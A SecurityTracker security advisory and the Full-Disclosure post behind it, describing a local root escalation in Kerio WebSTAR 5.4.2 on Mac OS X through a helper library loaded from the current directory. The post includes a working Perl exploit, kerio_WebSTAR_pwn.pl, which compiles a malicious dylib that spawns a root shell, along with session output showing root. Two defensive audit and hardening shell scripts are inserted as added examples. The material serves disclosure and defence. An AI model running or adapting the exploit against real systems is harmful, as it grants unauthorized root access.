SecurityTracker.com
SecurityTracker
Archives


 


Category: Application (Web Server/CGI) > Kerio WebSTAR
Vendors: Kerio Technologies
Kerio WebSTAR Lets Certain Local Users Gain Root Privileges
SecurityTracker Alert ID:  1017239
SecurityTracker URL:  http://securitytracker.com/id/1017239
CVE Reference:   CVE-2006-6131   (Links to External Site)
Updated:  Jun 2 2008
Original Entry Date:  Nov 16 2006
Impact:   Root access via local system
Vendor Confirmed: Yes
Exploit Included: Yes
Version(s): 5.4.2 and prior versions
Description:   A vulnerability was reported in Kerio WebSTAR. A local user can obtain root privileges on the target system.

A local user in the 'webstar' or 'admin' groups can invoke the 'WSAdminServer' or 'WSWebServer' applications to execute arbitrary code on the target system with root privileges.

Both applications search the current working directory for a helper library (libucache.dylib). A local user can place a specially crafted library of that name in a directory they can write to and run either application from there, causing the library's code to execute with root privileges.

Kevin Finisterre reported this vulnerability.

The original advisory is available at:

http://www.digitalmunition.com/DMA[2006-1115a].txt

Impact:   A local user in the 'admin' or 'webstar' group can obtain root privileges on the target system.
Solution:   No solution was available at the time of this entry. The vendor is working on a fix.

The report indicates that, as a workaround, you can clear the setuid bit on both binaries (the install path contains a space, so it must be quoted):

chmod -s "/Applications/Kerio WebSTAR/AdminServer/WSAdminServer" "/Applications/Kerio WebSTAR/WebServer/WSWebServer"

Vendor URL:  www.kerio.com/webstar_home.html (Links to External Site)
Cause:   Access control error
Underlying OS:  UNIX (macOS/OS X)

Message History:   None.


Source Message Contents

Subject:  [Full-disclosure] Kerio WebSTAR local privilege escalation

Attachment: DMA[2006-1115a].txt

DMA[2006-1115a] - 'Kerio WebSTAR local privilege escalation'
Author: Kevin Finisterre
Vendor(s): http://www.kerio.com/webstar_home.html
Product: 'Kerio WebSTAR <= 5.4.2 (?)'
References: 
http://www.digitalmunition.com/DMA[2006-1115a].txt

Description:
Kerio WebSTAR is an easy-to-use web server for Mac OS X. Acquired in January 2006 from 4D, Kerio WebSTAR 5 (formerly known as 4D WebSTAR Server Suite) helps small companies run Internet and intranet websites and integrate them with databases.

Upon installing Kerio WebSTAR you will find that you have inherited two setuid binaries in /Applications:
kevin-finisterres-computer:~/Desktop kf$ find /Applications/Kerio\ WebSTAR -perm -4000 -ls
978790 3016 -rwsrwx--x    1 root     admin     1542556 Apr 10  2006 /Applications/Kerio WebSTAR/AdminServer/WSAdminServer
979475 3288 -rwsrwx---    1 root     admin     1679724 Apr 10  2006 /Applications/Kerio WebSTAR/WebServer/WSWebServer

If an attacker is able to gain access to either the webstar user or the admin group, he or she may be able to execute code as root by abusing the binaries mentioned above. For some odd reason both binaries try to load a helper library from within the current directory. In most cases this is obviously not a good idea because an attacker can simply provide the application with the trojaned library of his choice.

kevin-finisterres-computer:~ kf$ /Applications/Kerio\ WebSTAR/WebServer/WSWebServer
dyld: Library not loaded: libucache.dylib
  Referenced from: /Applications/Kerio WebSTAR/WebServer/WSWebServer
  Reason: image not found
Trace/BPT trap

kevin-finisterres-computer:~ kf$ /Applications/Kerio\ WebSTAR/AdminServer/WSAdminServer  
dyld: Library not loaded: libucache.dylib
  Referenced from: /Applications/Kerio WebSTAR/AdminServer/WSAdminServer
  Reason: image not found
Trace/BPT trap

ktrace gives a better look at what is going on... 

  1183 WSAdminServer CALL  open(0x17e8,0,0)
  1183 WSAdminServer NAMI  "libucache.dylib"
  1183 WSAdminServer RET   open -1 errno 2 No such file or directory
  1183 WSAdminServer CALL  close(0xffffffff)
...
  1183 WSAdminServer CALL  open(0xbfffea90,0,0)
  1183 WSAdminServer NAMI  "/var/root/lib/libucache.dylib"
  1183 WSAdminServer RET   open -1 errno 2 No such file or directory
  1183 WSAdminServer CALL  close(0xffffffff)
  1183 WSAdminServer RET   close -1 errno 9 Bad file descriptor
  1183 WSAdminServer CALL  open(0xbfffea90,0,0)
  1183 WSAdminServer NAMI  "/usr/local/lib/libucache.dylib"
  1183 WSAdminServer RET   open -1 errno 2 No such file or directory
  1183 WSAdminServer CALL  close(0xffffffff)
  1183 WSAdminServer RET   close -1 errno 9 Bad file descriptor
  1183 WSAdminServer CALL  open(0xbfffeaa0,0,0)
  1183 WSAdminServer NAMI  "/usr/lib/libucache.dylib"
  1183 WSAdminServer RET   open -1 errno 2 No such file or directory
  1183 WSAdminServer CALL  close(0xffffffff)
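The ktrace output shows dyld resolving libucache.dylib by bare name, starting with the current working directory. The following audit script is an added example, not part of the advisory and not Kerio's code: it lists setuid binaries under a directory and flags every shared library a binary records without a directory component, which is exactly the condition that lets a writable cwd supply the library. It assumes `otool -L` is available for a real run on Mac OS X; the parser itself is exercised on a constructed transcript so the script also runs where otool is absent.

```shell
#!/bin/sh
# Added audit example; not part of the advisory and not Kerio's code.
# Lists setuid binaries under a directory and flags any shared library a
# binary references by bare file name (no '/' in the recorded path). Such a
# name is resolved through dyld's search path, which on the affected system
# starts in the current working directory.
# otool is only needed for a real run; the parser is exercised on a
# constructed transcript so the script also runs where otool is absent.

# flag_bare_dylibs: read `otool -L` output on stdin, print each dependency
# recorded without a directory component.
flag_bare_dylibs() {
    # otool -L prints a "binary:" header (one per architecture) followed by
    # indented dependency lines:
    #   <tab>path (compatibility version x, current version y)
    awk '/^[ \t]/ && NF > 0 { if ($1 !~ /\//) print $1 }'
}

# audit_setuid_tree DIR: report bare-name dependencies of every setuid file
# under DIR (requires otool; paths are quoted because "Kerio WebSTAR" has a space).
audit_setuid_tree() {
    find "$1" -type f -perm -4000 -print | while IFS= read -r bin; do
        otool -L "$bin" 2>/dev/null | flag_bare_dylibs | while IFS= read -r lib; do
            printf '%s: loads %s by bare name (resolved via dyld search path)\n' "$bin" "$lib"
        done
    done
}

# sample_otool_output: constructed transcript shaped like `otool -L` output
# for a binary that links one library by bare name (the advisory's
# libucache.dylib) and two by absolute path. Version numbers are made up.
sample_otool_output() {
    printf '%s:\n' '/Applications/Kerio WebSTAR/WebServer/WSWebServer'
    printf '\t%s (compatibility version 5.0.1, current version 5.0.1)\n' 'libucache.dylib'
    printf '\t%s (compatibility version 1.0.0, current version 88.3.9)\n' '/usr/lib/libSystem.B.dylib'
    printf '\t%s (compatibility version 7.0.0, current version 7.4.0)\n' '/usr/lib/libstdc++.6.dylib'
}

# sample_bare_dylibs: run the parser over the constructed transcript.
sample_bare_dylibs() {
    sample_otool_output | flag_bare_dylibs
}

if [ "$#" -gt 0 ]; then
    audit_setuid_tree "$1"      # real run: ./audit.sh "/Applications/Kerio WebSTAR"
else
    sample_bare_dylibs          # offline: prints libucache.dylib
fi
```

Run with the install directory as the only argument to audit a real system; with no argument it only parses the constructed transcript. A library that is flagged here is not proof of exploitability on its own, but for a setuid binary it is the condition the advisory describes and deserves the same treatment as the WebSTAR binaries.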

Exploitation is pretty cut and dry, change directories to a folder that you can write to, compile your helper library, and
take root. 

kevin-finisterres-computer:/tmp kf$ ./kerio_WebSTAR_pwn.pl 

Usage: ./kerio_WebSTAR_pwn.pl <target> 

Targets:

        0 . kerio-webstar-5.4.2-mac.bin - WSAdminServer
        1 . kerio-webstar-5.4.2-mac.bin - WSWebServer

kevin-finisterres-computer:/tmp kf$ ./kerio_WebSTAR_pwn.pl 0
*** Target: kerio-webstar-5.4.2-mac.bin - WSAdminServer, Binary: /Applications/Kerio WebSTAR/AdminServer/WSAdminServer
/tmp/kerio_pwn.c: In function 'kerio_pwned':
/tmp/kerio_pwn.c:2: warning: incompatible implicit declaration of built-in function 'exit'
sh-2.05b# id
uid=0(root) gid=0(wheel) groups=0(wheel), 81(appserveradm), 79(appserverusr), 9(procmod), 80(admin)

As mentioned previously you must be in the admin group or be the webstar user in order to exploit this issue. If permissions
have been changed other users may be able to elevate their status to root as well. 

kevin-finisterres-computer:~ notadmin$ id
uid=505(notadmin) gid=505(notadmin) groups=505(notadmin)
kevin-finisterres-computer:~ notadmin$ /Applications/Kerio\ WebSTAR/WebServer/WSWebServer
-bash: /Applications/Kerio WebSTAR/WebServer/WSWebServer: Permission denied
kevin-finisterres-computer:~ notadmin$ /Applications/Kerio\ WebSTAR/AdminServer/WSAdminServer
-bash: /Applications/Kerio WebSTAR/AdminServer/WSAdminServer: Permission denied

Workaround:
Kerio has been contacted, fixes will be available soon. In the meantime limit access to the admin group and the webstar user.

Please chmod -s /Applications/Kerio WebSTAR/AdminServer/WSAdminServer and /Applications/Kerio WebSTAR/WebServer/WSWebServer
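The workaround given above (and repeated in the SecurityTracker summary) is a single chmod, but the install path contains a space and the result is easy to get wrong or to leave unverified. The script below is an added example, not part of the advisory and not Kerio's code: it clears the setuid bit on every setuid file under the install directory with the paths quoted, then checks that none remain. With no argument it builds a throwaway directory tree that mimics the advisory's layout instead of touching the real /Applications path; the file names and modes in that tree are taken from the advisory's listing, but the files themselves are empty and constructed for this example.

```shell
#!/bin/sh
# Added hardening example; not part of the advisory and not Kerio's code.
# Applies the advisory's workaround (clear the setuid bit on both WebSTAR
# binaries) with the paths quoted, since the space in "Kerio WebSTAR" splits
# an unquoted path into two arguments, then verifies that no setuid file is
# left under the install directory. With no argument it runs against a
# constructed directory tree instead of the real /Applications path.

# count_setuid_under ROOT: number of setuid regular files below ROOT.
count_setuid_under() {
    find "$1" -type f -perm -4000 | wc -l | tr -d ' '
}

# strip_setuid_under ROOT: clear setuid on every setuid file below ROOT,
# print each path touched, and fail if any setuid file remains.
# `chmod u-s` clears only setuid; the advisory's `chmod -s` also clears setgid.
strip_setuid_under() {
    find "$1" -type f -perm -4000 -print | while IFS= read -r f; do
        chmod u-s "$f" && printf 'cleared setuid: %s\n' "$f"
    done
    [ "$(count_setuid_under "$1")" -eq 0 ]
}

# make_constructed_tree: throwaway tree mimicking the advisory's layout (two
# setuid files under a directory whose name contains a space). Constructed
# for this example; the files are empty and not the product's binaries.
# Prints the tree root.
make_constructed_tree() {
    base=$(mktemp -d) || return 1
    top="$base/Kerio WebSTAR"
    mkdir -p "$top/AdminServer" "$top/WebServer"
    : > "$top/AdminServer/WSAdminServer"
    : > "$top/WebServer/WSWebServer"
    chmod 4771 "$top/AdminServer/WSAdminServer"   # -rwsrwx--x as in the listing
    chmod 4770 "$top/WebServer/WSWebServer"       # -rwsrwx--- as in the listing
    printf '%s\n' "$top"
}

# demo: build the constructed tree, apply the workaround, and print the
# setuid count before and after (expected: "2 0"), then clean up.
demo() {
    top=$(make_constructed_tree) || return 1
    before=$(count_setuid_under "$top")
    strip_setuid_under "$top" >/dev/null
    after=$(count_setuid_under "$top")
    rm -rf "$(dirname "$top")"
    printf '%s %s\n' "$before" "$after"
}

if [ "$#" -gt 0 ]; then
    strip_setuid_under "$1"     # real run: ./strip.sh "/Applications/Kerio WebSTAR"
else
    demo                        # offline: prints "2 0"
fi
```

On the real system the script must run as a user allowed to chmod the binaries (they are owned by root), and the final count doubles as the check that a later reinstall or update has not restored the bit.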

Attachment: kerio_WebSTAR_pwn.pl

#!/usr/bin/perl
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com) 
#
# you must have access to the webstar user or be in the admin group
#
# This is currently not patched... chmod -s your kerio binaries

foreach $key (keys %ENV) {

    delete $ENV{$key};

}

$tgts{"0"} = "kerio-webstar-5.4.2-mac.bin - WSAdminServer:/Applications/Kerio WebSTAR/AdminServer/WSAdminServer";
$tgts{"1"} = "kerio-webstar-5.4.2-mac.bin - WSWebServer:/Applications/Kerio WebSTAR/WebServer/WSWebServer";

unless (($target) = @ARGV) {

        print "\n\nUsage: $0 <target> \n\nTargets:\n\n";

        foreach $key (sort(keys %tgts)) {
                ($a,$b) = split(/\:/,$tgts{"$key"});
                print "\t$key . $a\n";
        }

        print "\n";
        exit 1;
}

$ret = pack("l", ($retval));
($a,$b) = split(/\:/,$tgts{"$target"});
print "*** Target: $a, Binary: $b\n";

open(KP,">/tmp/kerio_pwn.c");
printf KP "extern char * argv; __attribute__((constructor)) static void kerio_pwned()\n"; 
printf KP "{ seteuid(0); setegid(0); setuid(0); setgid(0); system(\"/bin/sh -i\"); exit(0); }\n";

system("gcc -dynamiclib -o /tmp/libucache.dylib /tmp/kerio_pwn.c -current_version 5.0.1 -compatibility_version 5.0.1 -install_name libucache.5.dylib -arch ppc"); 
 
system("cd /tmp; \"$b\"");







_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

 
 



Copyright 2021, SecurityGlobal.net LLC